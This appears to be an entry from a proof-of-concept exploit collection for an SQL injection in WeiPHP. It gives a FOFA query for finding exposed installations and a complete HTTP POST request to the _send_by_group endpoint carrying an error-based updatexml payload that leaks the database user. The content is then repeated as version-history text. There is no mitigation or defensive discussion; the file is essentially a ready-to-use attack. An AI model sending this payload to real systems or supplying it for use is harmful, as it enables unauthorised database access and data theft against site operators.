POC00/WeiPHP存在SQL注入漏洞.md


## WeiPHP存在SQL注入漏洞

## fofa
```
app="WeiPHP"
```

## poc
```
POST /public/index.php/weixin/message/_send_by_group HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
 
group_id[0]=exp&group_id[1]=%29+and+updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29+--
```
Create WeiPHP>=5.0 SQL注入漏洞.md 2023-12-07 20:57:39 +08:00
Update and rename WeiPHP>=5.0 SQL注入漏洞.md to WeiPHP存在SQL注入漏洞.md 2024-04-10 15:44:57 +08:00			`## WeiPHP存在SQL注入漏洞`
Create WeiPHP>=5.0 SQL注入漏洞.md 2023-12-07 20:57:39 +08:00
			`## fofa`
			```
			`app="WeiPHP"`
			```

			`## poc`
			```
			`POST /public/index.php/weixin/message/_send_by_group HTTP/1.1`
			`Host:`
			`Content-Type: application/x-www-form-urlencoded`
			`Accept-Encoding: gzip`
			`Connection: close`

			`group_id[0]=exp&group_id[1]=%29+and+updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29+--`
			```